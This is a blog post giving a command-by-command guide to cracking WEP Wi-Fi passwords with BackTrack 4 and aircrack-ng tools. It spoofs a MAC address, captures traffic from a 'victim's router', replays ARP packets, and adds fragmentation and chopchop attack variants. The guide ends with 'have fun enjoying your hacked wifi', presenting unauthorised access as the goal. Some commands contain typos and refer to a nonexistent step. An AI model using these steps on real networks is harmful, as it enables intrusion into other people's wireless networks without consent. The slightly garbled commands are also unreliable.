First, you will need to have Backtrack 4 (LINK)
*** I find it that if you are smart enough to be into hacking you will atleast know how to burn an image file to a DVD, so after you do that, boot up the DVD in the and run BT4.
Login: root
Password: toor
Once logged in, type in: startx
BT4 is now set up, heres the following.
==
WEP CRACK GUIDE
1. Open konsole and type the following to start up network connections.
/etc/init.d/networking start
2. Now we are going to put the network card into monter mode by typing the following.
airmon-ng
(You will find your Interface here)
3. So first start up the scan
airmon-ng start wlan0 or 1
(depends on what it reads your card as, replace as needed)
4.Lets spoof your MAC address first by typing this next command.
ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up
This will make it so we change our MAC address to the computer we are connecting to
5.Time to start finding our victims router, type in konsole.
airodump-ng mon0
This will show the list and once you find one that suits your interest, Continue.
6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole
airodump-ng -c channel number, –bssid the BSSID of the router, -w what you want to save the cap file as, then mon0 (the interface we are using)
example: airodump-ng -c 1 – - bssid 11:22:33:44:55:66 -w wepcap mon0
7. Lets start the passkey cracking. We need to get around 20,000-50,000 IVs. We start by sending fake authentication requests. To do this open a new konsole and type:
aireplay-ng -1 1 -a The BSSID of the router, then the interface.
example: aireplay-ng -1 1 a 11:22:33:44:55:66 mon0
8. Almost done, we just need to contune the ARP cycle, open another konsole and type:
aireplay-ng -3 -b The BSSID of the router, then the interface, and it will start replaying ARPs.
Collect a good ammount of IVs like around 20k to 50k. Once its their, type CTRL – C to stop the process and continue to 9.
9. Time to start cracking that cap file Open a new konsole and type.
aircrack-ng -b (bssid) (file name)-01.cap
example: aircrack-ng 11:22:33:44:55:66 wepcap-01.cap
10. Now we should have the key to log in to the router, have fun enjoying your hacked wifi
Here is some alternate methods of using backtrack to get from Hakunamatata69 Tutorial that are interesting and work too.
==
—ALTERNATE ATTACKS—
FRAGMENTATION
1. Konsole.
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) –bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap
==
CHOPCHOP
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK
***Be sure to open new Konsoles when necessary***
–
NOTES
Key Commands.
wlan0 = Interface (Examples: wlan0, ath0, eth0)
ch = The channel the target is on (Examples: 6, 11)
bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
ssid = Name of target (Examples: linksys, default)
filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
0 comments:
Post a Comment